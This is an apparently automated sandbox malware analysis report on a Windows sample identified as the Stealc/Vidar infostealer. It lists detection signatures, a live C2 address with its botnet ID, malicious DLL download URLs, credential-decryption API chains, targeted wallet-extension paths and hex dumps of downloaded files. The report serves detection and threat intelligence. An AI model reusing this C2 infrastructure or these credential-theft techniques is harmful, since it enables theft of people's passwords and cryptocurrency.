Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1518819
MD5:	ef4d942f44362d48b109c8a182ba537d
SHA1:	b2732ce2977293e2f08e4ddfc0012a6673208692
SHA256:	fb2fdeded1386ef31205d4e56c05942f49b0292688d14bdc0616c22cae4567b3
Tags:	exeuser-Bitsight
Infos:

Detection

Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Searches for specific processes (likely to inject)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.37/0d60be0de163924d/nss3.dlly	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpdowsApps	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/b	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/nss3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php.dllA	Avira URL Cloud: Label: malware
Source: http://185.215.113.37	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/mozglue.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpimple-storage.json	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/softokn3.dll0	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/softokn3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpw	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/freebl3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phption:	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpa	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpGDHJDHDAFHJJKJEHC	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/sqlite3.dllV	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/nss3.dll8	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpZ	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/sqlite3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll5.113.37	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpB	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php?	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/msvcp140.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/nss3.dllJ	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpH	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php.	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/vcruntime140.dllA	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php4	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php3	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php:	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpwser	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/nss3.dllg	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php#	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/nss3.dlll	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0.2.file.exe.760000.0.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
Source: 0.2.file.exe.760000.0.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00769B60 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00769B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0076C820 lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	0_2_0076C820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00767240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00767240
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00769AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00769AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00778EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_00778EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBA6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	0_2_6CBA6C80

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.1667089249.000000006CDCF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.1667089249.000000006CDCF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00774910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00774910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0076DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0076DA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0076E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0076E430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0076BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0076BE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007616D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_007616D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0076F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0076F6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00773EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00773EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007738B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_007738B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00774570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00774570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0076ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0076ED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0076DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0076DE10

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49705 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.8:49705 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.37:80 -> 192.168.2.8:49705
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.8:49705 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.37:80 -> 192.168.2.8:49705
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.8:49705 -> 185.215.113.37:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Sep 2024 00:40:11 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Sep 2024 00:40:16 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Sep 2024 00:40:17 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 